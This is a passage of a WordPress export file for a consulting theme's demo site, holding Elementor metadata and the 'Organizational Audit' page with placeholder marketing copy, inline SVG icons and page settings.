}}}s:9:"iprogress";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:3;s:5:"title";i:3;s:7:"percent";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:2;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:3;}}}}s:6:"column";a:3:{s:5:"count";i:16;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:16;s:19:"_inline_size_tablet";i:4;s:19:"_inline_size_mobile";i:4;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:13:"margin_tablet";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:9;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:4:{s:3:"gap";i:6;s:6:"layout";i:5;s:16:"content_position";i:1;s:13:"content_width";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:6;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:7:{s:7:"padding";i:6;s:14:"padding_mobile";i:3;s:6:"margin";i:3;s:13:"margin_mobile";i:3;s:14:"padding_tablet";i:1;s:13:"margin_tablet";i:2;s:7:"z_index";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:6:{s:21:"background_background";i:3;s:16:"background_image";i:1;s:19:"background_position";i:1;s:17:"background_repeat";i:1;s:15:"background_size";i:1;s:16:"background_color";i:2;}s:14:"section_border";a:3:{s:13:"border_radius";i:3;s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:2;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:2;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:2;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:2;s:9:"icon_size";i:2;}s:18:"section_text_style";a:8:{s:11:"text_indent";i:2;s:10:"text_color";i:1;s:16:"text_color_hover";i:1;s:26:"icon_typography_typography";i:1;s:27:"icon_typography_font_family";i:1;s:25:"icon_typography_font_size";i:1;s:27:"icon_typography_font_weight";i:1;s:30:"icon_typography_text_transform";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}}}s:7:"divider";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:4;s:3:"gap";i:4;s:6:"weight";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:12:"_css_classes";i:2;s:7:"_margin";i:2;}}}}s:8:"icon-box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:9;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:3;s:16:"description_text";i:3;s:8:"position";i:3;s:10:"title_size";i:3;s:13:"selected_icon";i:3;s:4:"link";i:2;}}s:5:"style";a:2:{s:18:"section_style_icon";a:5:{s:13:"primary_color";i:3;s:9:"icon_size";i:3;s:6:"rotate";i:3;s:10:"icon_space";i:3;s:17:"icon_space_mobile";i:3;}s:21:"section_style_content";a:12:{s:18:"title_bottom_space";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;s:33:"description_typography_typography";i:3;s:32:"description_typography_font_size";i:3;s:34:"description_typography_font_weight";i:3;s:11:"title_color";i:3;s:28:"title_typography_font_family";i:3;s:17:"description_color";i:3;s:34:"description_typography_font_family";i:3;s:17:"text_align_mobile";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:3;s:14:"_margin_mobile";i:2;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:2:{s:19:"_section_background";a:1:{s:22:"_background_background";i:1;}s:15:"_section_border";a:2:{s:14:"_border_radius";i:1;s:21:"_border_radius_tablet";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:1:{s:12:"css_responce";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[869]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[select_footer]]></wp:meta_key>
		<wp:meta_value><![CDATA[1684]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Organizational Audit</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-services/organizational-audit/</link>
		<pubDate>Thu, 17 Sep 2020 04:03:11 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=959</guid>
		<description></description>
		<content:encoded><![CDATA[<h6>how we help</h6>		
			<h1>Align Costs with Strategy & Focus on Growth</h1>		
			<a href="#">get in touch</a>
	        main principles	        <h3>Global Reach with Local  Understanding</h3>	    
				In what areas do you provide management consulting? 
					<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention.</p>				
				In which countries do you provide consulting services? 
					<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention.</p>				
				How is a consulting project started and organized? 
					<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention.</p>				
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project-home-2.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project-home-2.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-home-2-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
	        our benefits	        <h3>Why Clients Choose Us</h3>	    
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M436.275,39.807H304.797C300.155,17.119,280.039,0,256,0s-44.156,17.119-48.798,39.807H75.725    c-14.771,0-26.789,12.018-26.789,26.789V351.16c0,14.771,12.017,26.789,26.789,26.789H200.63l-40.566,120.866    c-1.757,5.235,1.063,10.904,6.299,12.662c1.055,0.354,2.128,0.522,3.183,0.522c4.179,0,8.076-2.641,9.479-6.821l42.702-127.229    h68.546l42.702,127.229c1.403,4.181,5.3,6.821,9.479,6.821c1.055,0,2.128-0.169,3.183-0.522c5.236-1.758,8.056-7.427,6.299-12.662    l-40.566-120.866h124.905c14.771,0,26.789-12.018,26.789-26.789V66.596C463.063,51.824,451.046,39.807,436.275,39.807z M256,20    c12.93,0,23.963,8.274,28.082,19.807h-56.163C232.038,28.274,243.071,20,256,20z M443.063,351.16c0,3.743-3.045,6.789-6.789,6.789    h-26.121v-142.56c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10V357.95H359.39V245.979c0-5.522-4.477-10-10-10    c-5.523,0-10,4.478-10,10v111.97h-28.084v-79.255c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v79.255h-25.308V253.277    c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v104.672h-29.037v-55.023c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v55.023    h-23.221v-50.985c0-5.522-4.477-10-10-10s-10,4.478-10,10v50.985h-26.777v-39.337c0-5.522-4.477-10-10-10s-10,4.478-10,10v39.337    h-31.24c-3.743,0-6.789-3.046-6.789-6.789V66.596c0-3.743,3.045-6.789,6.789-6.789h140.468h79.614h140.468    c3.743,0,6.789,3.046,6.789,6.789V351.16z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M410.105,106.884c-0.013-0.137-0.039-0.269-0.058-0.404c-0.026-0.188-0.049-0.377-0.086-0.564    c-0.031-0.158-0.075-0.312-0.114-0.467c-0.04-0.161-0.076-0.323-0.124-0.482c-0.046-0.153-0.104-0.301-0.158-0.451    c-0.056-0.158-0.109-0.317-0.173-0.473c-0.058-0.139-0.125-0.272-0.189-0.407c-0.075-0.161-0.147-0.323-0.231-0.48    c-0.068-0.127-0.146-0.249-0.22-0.373c-0.093-0.156-0.181-0.314-0.283-0.466c-0.089-0.134-0.19-0.259-0.285-0.388    c-0.098-0.133-0.191-0.268-0.297-0.397c-0.179-0.218-0.37-0.425-0.567-0.627c-0.033-0.033-0.06-0.07-0.093-0.103    c-0.032-0.032-0.068-0.059-0.1-0.09c-0.203-0.198-0.412-0.39-0.631-0.57c-0.122-0.1-0.25-0.188-0.376-0.281    c-0.136-0.102-0.269-0.207-0.41-0.302c-0.144-0.096-0.293-0.179-0.44-0.267c-0.133-0.08-0.264-0.163-0.401-0.237    c-0.146-0.078-0.296-0.144-0.445-0.214c-0.147-0.07-0.292-0.143-0.444-0.206c-0.141-0.058-0.285-0.105-0.427-0.156    c-0.166-0.06-0.329-0.123-0.499-0.174c-0.139-0.042-0.279-0.072-0.419-0.108c-0.176-0.045-0.35-0.094-0.53-0.129    c-0.156-0.031-0.314-0.049-0.471-0.072c-0.166-0.025-0.329-0.055-0.497-0.072c-0.267-0.026-0.535-0.036-0.804-0.041    c-0.06-0.001-0.118-0.009-0.178-0.009h-43.197c-5.523,0-10,4.478-10,10s4.477,10,10,10h19.054l-83.028,83.028l-21.797-21.798    c-1.875-1.875-4.419-2.929-7.071-2.929s-5.196,1.054-7.071,2.929l-72.161,72.162l-21.543-21.543    c-3.905-3.904-10.237-3.904-14.142,0l-36.492,36.492c-3.905,3.905-3.905,10.237,0,14.143c1.953,1.952,4.512,2.929,7.071,2.929    c2.559,0,5.119-0.977,7.071-2.929l29.42-29.421l21.543,21.542c3.905,3.904,10.237,3.904,14.142,0l72.161-72.161l21.797,21.798    c1.875,1.875,4.419,2.929,7.071,2.929s5.196-1.054,7.071-2.929l90.099-90.099v19.054c0,5.522,4.477,10,10,10    c5.523,0,10-4.478,10-10v-43.191C410.155,107.546,410.138,107.214,410.105,106.884z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="107.869" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="148.639" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="189.409" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Consulting</a></h5>				<p>We’ve been a strategy thought leader for nearly five decades
and we bring unrivaled </p>			
        			<a href="#"class="link-details"> Explore More </a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M473.492,189.736h-0.001l-22.417-2.651c-2.44-6.903-5.255-13.693-8.412-20.293l13.979-17.731    c13.686-17.358,13.649-40.806-0.084-54.541l-39.083-39.083c-13.734-13.734-37.182-13.771-54.543-0.083l-17.73,13.981    c-6.603-3.159-13.393-5.974-20.294-8.412l-2.651-22.417C319.659,16.554,303.054,0,283.63,0h-55.271    c-19.424,0-36.03,16.555-38.626,38.51l-2.65,22.417c-6.899,2.439-13.684,5.251-20.284,8.408l-17.73-13.981    c-17.359-13.687-40.807-13.653-54.543,0.083L55.444,94.519c-13.734,13.735-13.771,37.183-0.084,54.541l13.979,17.73    c-3.159,6.602-5.974,13.392-8.413,20.293l-22.418,2.651C16.555,192.33,0,208.935,0,228.359v55.271    c0,19.423,16.554,36.029,38.506,38.624l22.417,2.652c2.438,6.902,5.253,13.692,8.411,20.294l-13.981,17.731    c-13.688,17.359-13.652,40.807,0.083,54.542l39.082,39.083c13.733,13.733,37.182,13.771,54.541,0.084l17.73-13.979    c6.603,3.159,13.393,5.974,20.294,8.413l2.65,22.417C192.329,495.445,208.934,512,228.359,512h55.271    c19.424,0,36.029-16.554,38.626-38.507l2.651-22.416c6.906-2.44,13.698-5.255,20.304-8.416l17.73,13.98    c17.359,13.684,40.807,13.65,54.541-0.085l39.082-39.082c13.734-13.734,13.771-37.182,0.083-54.542l-13.981-17.731    c3.158-6.602,5.973-13.392,8.411-20.294l22.416-2.652C495.445,319.658,512,303.053,512,283.63v-55.271    C512,208.935,495.445,192.33,473.492,189.736z M492,283.63c0,9.291-8.966,17.357-20.854,18.763l-28.704,3.396    c-3.897,0.461-7.165,3.16-8.354,6.9c-3.183,10.008-7.246,19.808-12.073,29.128c-1.807,3.487-1.406,7.709,1.026,10.792    l17.904,22.706c7.413,9.403,8.049,21.448,1.479,28.017l-39.082,39.083c-6.57,6.569-18.614,5.934-28.016-1.479l-22.706-17.903    c-3.083-2.431-7.303-2.833-10.792-1.026c-9.325,4.831-19.128,8.895-29.136,12.078c-3.74,1.189-6.439,4.457-6.9,8.355    l-3.396,28.705c-1.407,11.89-9.474,20.856-18.765,20.856H228.36c-9.292,0-17.359-8.967-18.765-20.857l-3.394-28.706    c-0.461-3.897-3.159-7.166-6.899-8.355c-10.006-3.183-19.806-7.246-29.129-12.076c-1.451-0.752-3.029-1.121-4.598-1.121    c-2.204,0-4.392,0.727-6.193,2.149l-22.706,17.902c-9.403,7.414-21.448,8.047-28.016,1.479l-39.082-39.083    c-6.571-6.57-5.935-18.614,1.479-28.016l17.904-22.707c2.431-3.084,2.833-7.306,1.026-10.792    c-4.827-9.319-8.889-19.12-12.073-29.128c-1.189-3.74-4.457-6.439-8.354-6.9l-28.705-3.396C28.966,300.987,20,292.921,20,283.63    v-55.271c0-9.291,8.967-17.358,20.857-18.764l28.706-3.394c3.898-0.461,7.166-3.159,8.355-6.899    c3.183-10.006,7.246-19.807,12.075-29.129c1.807-3.486,1.406-7.708-1.026-10.791l-17.902-22.706    c-7.414-9.402-8.049-21.446-1.479-28.016l39.081-39.083c6.569-6.57,18.615-5.935,28.017,1.48l22.706,17.904    c3.083,2.431,7.304,2.834,10.791,1.027c9.318-4.827,19.115-8.888,29.12-12.071c3.74-1.189,6.438-4.457,6.899-8.355l3.394-28.705    C211.001,28.967,219.067,20,228.359,20h55.271c9.291,0,17.358,8.966,18.764,20.855l3.396,28.705c0.461,3.898,3.16,7.166,6.9,8.355    c10.005,3.181,19.806,7.244,29.128,12.073c3.484,1.807,7.708,1.406,10.792-1.026l22.706-17.904    c9.404-7.412,21.448-8.051,28.017-1.48l39.083,39.082c6.569,6.57,5.933,18.614-1.479,28.016l-17.903,22.707    c-2.431,3.084-2.833,7.305-1.026,10.792c4.827,9.315,8.889,19.115,12.075,29.127c1.189,3.74,4.457,6.439,8.355,6.899l28.706,3.394    h-0.001c11.89,1.406,20.857,9.473,20.857,18.764V283.63z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M255.999,94.28c-89.173,0-161.721,72.548-161.721,161.721c0,35.631,11.362,69.426,32.86,97.729    c20.797,27.382,50.325,47.78,83.142,57.435c5.301,1.56,10.856-1.473,12.416-6.771c1.559-5.298-1.472-10.857-6.771-12.416    C156.078,374.37,114.279,318.454,114.279,256c0-78.145,63.575-141.721,141.721-141.721S397.721,177.855,397.721,256    c0,64.606-43.619,121.026-106.076,137.203c-5.346,1.385-8.558,6.842-7.173,12.188c1.167,4.506,5.226,7.495,9.674,7.495    c0.831,0,1.674-0.104,2.515-0.322C367.94,394.102,417.721,329.72,417.721,256C417.721,166.827,345.172,94.28,255.999,94.28z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M334.324,302.94L266,251.038v-44.663c0-5.523-4.478-10-10-10c-5.522,0-10,4.477-10,10V256    c0,3.126,1.462,6.072,3.952,7.962l72.275,54.903c1.809,1.374,3.933,2.038,6.041,2.038c3.019,0,6.003-1.361,7.97-3.951    C339.579,312.554,338.722,306.281,334.324,302.94z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="256" cy="164.02" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="252.36" cy="407.72" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Planning</a></h5>				<p>We’ve been a strategy thought leader for nearly five decades
and we bring unrivaled </p>			
        			<a href="#"class="link-details"> Explore More </a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M489.129,42.371h-32.011V10c0-5.523-4.477-10-10-10s-10,4.477-10,10v38.237l-41.806,41.92    c-42.173-38.385-96.385-59.418-153.76-59.418c-61.083,0-118.511,23.787-161.703,66.979C36.657,140.91,12.87,198.338,12.87,259.421    s23.787,118.511,66.979,161.703c6.719,6.719,13.783,12.967,21.151,18.73l-55.074,55.074c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.952,4.512,2.929,7.071,2.929c2.559,0,5.119-0.977,7.071-2.929l57.452-57.453c36.629,23.742,79.348,36.485,124.031,36.485    c44.901,0,87.818-12.868,124.566-36.833l57.801,57.801c1.953,1.952,4.512,2.929,7.071,2.929c2.559,0,5.119-0.977,7.071-2.929    c3.905-3.905,3.906-10.237,0-14.143l-55.467-55.467c7.19-5.656,14.092-11.769,20.661-18.337    c43.192-43.192,66.979-100.62,66.979-161.703c0-34.789-7.614-68.199-22.63-99.303c-2.401-4.974-8.381-7.06-13.353-4.658    c-4.974,2.401-7.059,8.379-4.658,13.353c13.696,28.37,20.641,58.855,20.641,90.608c0,115.068-93.615,208.683-208.683,208.683    S32.867,374.49,32.867,259.421c0-115.068,93.615-208.683,208.683-208.683c52.045,0,101.242,18.958,139.627,53.59l-35.099,35.195    c-28.976-25.325-65.717-39.171-104.527-39.171c-87.711,0-159.069,71.358-159.069,159.069s71.36,159.069,159.071,159.069    s159.069-71.358,159.069-159.069c0-14.146-1.859-28.178-5.527-41.708c-6.436-23.746-18.393-45.726-34.797-64.125l42.276-42.391    c0.013-0.013,0.028-0.024,0.041-0.037c0.012-0.012,0.021-0.025,0.033-0.036l48.621-48.753h37.861c5.523,0,10-4.477,10-10    S494.652,42.371,489.129,42.371z M375.792,222.945c3.206,11.825,4.831,24.097,4.831,36.476    c0,76.683-62.386,139.069-139.069,139.069s-139.069-62.387-139.069-139.069s62.386-139.069,139.069-139.069    c33.479,0,65.202,11.779,90.375,33.362l-41.285,41.397c-13.628-10.428-30.644-16.643-49.09-16.643    c-44.637,0-80.953,36.315-80.953,80.953s36.315,80.953,80.953,80.953s80.953-36.315,80.953-80.953    c0-18.997-6.594-36.473-17.592-50.297l41.232-41.344C360.089,183.686,370.271,202.573,375.792,222.945z M235.828,264.236    c1.952,1.946,4.507,2.919,7.062,2.919c2.563,0,5.127-0.979,7.081-2.938l40.71-40.821c7.426,10.1,11.825,22.556,11.825,36.025    c0,33.609-27.343,60.953-60.953,60.953c-33.61,0-60.953-27.344-60.953-60.953s27.343-60.953,60.953-60.953    c12.935,0,24.933,4.062,34.81,10.961l-40.554,40.664C231.909,254.004,231.917,260.335,235.828,264.236z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="419.22" cy="133.64" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Strategy</a></h5>				<p>We’ve been a strategy thought leader for nearly five decades
and we bring unrivaled </p>			
        			<a href="#"class="link-details"> Explore More </a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<circle cx="87.43" cy="406.69" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="470.4" cy="287.44" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M354.647,212.344h-5.797h-3.761h-5.797c-4.854,0-8.802-3.948-8.802-8.802v-8.931c0.001-4.854,3.949-8.802,8.802-8.802    h17.012c3.939,0,7.145,3.204,7.145,7.144c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10c0-14.743-11.818-26.771-26.479-27.127    v-8.584c0-5.522-4.478-10-10-10c-5.522,0-10,4.478-10,10v8.669c-14.798,1.188-26.479,13.602-26.479,28.7v8.931    c0,15.881,12.921,28.802,28.802,28.802h5.797h3.761h5.797c4.854,0,8.802,3.948,8.802,8.801v8.932c0,4.853-3.948,8.801-8.802,8.801    h-17.012c-3.939,0-7.145-3.204-7.145-7.144c0-5.522-4.478-10-10-10c-5.522,0-10,4.478-10,10c0,14.744,11.819,26.771,26.479,27.127    v8.584c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10v-8.669c14.798-1.188,26.479-13.601,26.479-28.699v-8.932    C383.449,225.264,370.528,212.344,354.647,212.344z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M499.899,339.009c-4.115-9.319-11.613-16.479-21.112-20.159c-9.499-3.68-19.864-3.442-29.183,0.675    c-0.05,0.021-0.1,0.044-0.148,0.066l-62.989,29.048c-5.016,2.313-7.206,8.254-4.894,13.269c2.313,5.016,8.255,7.205,13.269,4.894    l62.908-29.011c4.415-1.927,9.317-2.03,13.813-0.291c4.518,1.751,8.083,5.155,10.04,9.588c1.958,4.433,2.071,9.361,0.321,13.879    c-1.751,4.519-5.155,8.084-9.588,10.041l-128.9,56.914c-20.326,8.975-43.397,8.453-63.301-1.435l-47.185-23.441    c-25.238-12.539-54.498-13.204-80.277-1.819l-0.6,0.264l-34.973-79.21l48.628-21.47c23.239-10.261,49.169-11.087,73.012-2.332    l94.885,34.845c8.475,3.112,12.992,12.594,10.069,21.135c-2.978,8.704-12.491,13.387-21.205,10.44l-73.375-24.818    c-5.233-1.77-10.907,1.037-12.677,6.269c-1.77,5.232,1.037,10.907,6.269,12.677l73.375,24.818    c3.88,1.313,7.831,1.936,11.721,1.936c15.283,0,29.606-9.62,34.816-24.848c6.413-18.746-3.501-39.553-22.099-46.382    l-94.885-34.845c-6.382-2.344-12.888-4.115-19.454-5.321v-55.277c0-54.504,44.343-98.847,98.847-98.847h36.524    c54.505,0,98.848,44.343,98.848,98.847v26.061c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10v-26.061    c0-57.721-41.365-105.956-96.008-116.636V72.349l25.267-43.222c1.429-2.443,1.755-5.378,0.897-8.075    c-0.858-2.697-2.817-4.905-5.394-6.076l-30.99-14.08c-2.373-1.078-5.072-1.187-7.523-0.305l-22.995,8.276l-20.396-8.153    c-2.345-0.936-4.956-0.951-7.312-0.044l-32.428,12.511c-2.698,1.041-4.813,3.2-5.801,5.919c-0.986,2.719-0.748,5.731,0.655,8.261    l24.881,44.867v30.038c-55.169,10.258-97.072,58.744-97.072,116.84v53.36c-16.52-0.156-33.022,3.199-48.53,10.046l-48.99,21.63    c-2.806-4.199-6.808-7.445-11.615-9.307c-6.172-2.392-12.907-2.236-18.938,0.427l-63.29,27.733    c-3.637,1.594-5.986,5.188-5.986,9.159V502c0,3.473,1.802,6.697,4.76,8.518c1.603,0.985,3.419,1.482,5.24,1.482    c1.542,0,3.088-0.356,4.509-1.074l122.873-62.071c5.926-2.698,10.477-7.518,12.833-13.6c1.925-4.969,2.199-10.302,0.839-15.352    l0.865-0.382c20.327-8.977,43.401-8.454,63.301,1.435l47.185,23.442c25.239,12.536,54.498,13.199,80.277,1.818l128.9-56.914    c9.319-4.114,16.479-11.612,20.159-21.111C504.252,358.692,504.013,348.328,499.899,339.009z M364.391,100.259h-2.84h-36.524    h-1.775V79.641h41.139V100.259z M301.431,27.704l18.049-6.961l20.275,8.105c2.272,0.908,4.798,0.953,7.099,0.123l22.744-8.187    l17.201,7.815l-18.146,31.04h-49.512L301.431,27.704z M137.868,430.678c-0.158,0.07-0.315,0.145-0.47,0.223L28.831,485.745    v-40.524l28.113-13.805c4.958-2.435,7.003-8.427,4.569-13.384c-2.435-4.958-8.425-7.005-13.384-4.569l-19.299,9.476V338.69    l57.329-25.122c1.575-0.694,2.97-0.352,3.661-0.084c0.689,0.268,1.951,0.951,2.647,2.528l2.292,5.19    c0.001,0.002,0.001,0.004,0.002,0.006c0.001,0.002,0.002,0.004,0.003,0.006l45.546,103.154    C141.377,426.782,140.282,429.612,137.868,430.678z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Support</a></h5>				<p>We’ve been a strategy thought leader for nearly five decades
and we bring unrivaled </p>			
        			<a href="#"class="link-details"> Explore More </a>
			<h2>Looking for a First-Class Finance Firm?</h2>		
		<p>We welcome and celebrate different perspectives to help our firm, our clients and our people.</p>		
			<a href="http://wpdemo.archiwp.com/maxbizz/contact-us">get in touch</a>
	        reliable & safe	        <h3>Our Strategy Development</h3>	    
						<ul>
								<li data-tab="tab-1194">Research</li>
								<li data-tab="tab-2194">aproach</li>
								<li data-tab="tab-3194">result</li>
							</ul>
				<p>We are working in the format of an outsourcing project office. We assume operational coordination and control over the compliance with all project implementation parameters that ensures the execution of works on time.</p><p>Integrated career development, business consulting and digital media solutions connect your vision to results. Instead of quick-fix, out of the box, buy-in-bulk products, I develop highly customized solutions.</p>			
				<p>We can definitely define the provided level and range of Synergy Development Consulting as a full-cycle support. Therefore, we treat each client as an equal partner in the long term. Our team consists of talented and motivated people who are united by love to their work!</p><p>Integrated career development, business consulting and digital media solutions connect your vision to results. Instead of quick-fix, out of the box, buy-in-bulk products, I develop highly customized solutions.</p>			
				<p>Successful experience of experts in structuring investment projects, developing and implementing construction, developers and energy projects, restructuring programs, etc. provides a positive impact on your company profitability.</p><p>Integrated career development, business consulting and digital media solutions connect your vision to results. Instead of quick-fix, out of the box, buy-in-bulk products, I develop highly customized solutions.</p>			
			<a href="#">Explore More </a>
										<img width="466" height="296" src="https://maxbizz.s3.amazonaws.com/images/chart1-service-home2.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart1-service-home2.png 466w, https://maxbizz.s3.amazonaws.com/images/chart1-service-home2-300x191.png 300w" sizes="(max-width: 466px) 100vw, 466px" />]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>959</wp:post_id>
		<wp:post_date><![CDATA[2020-09-17 04:03:11]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-17 04:03:11]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[organizational-audit]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[869]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.11]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
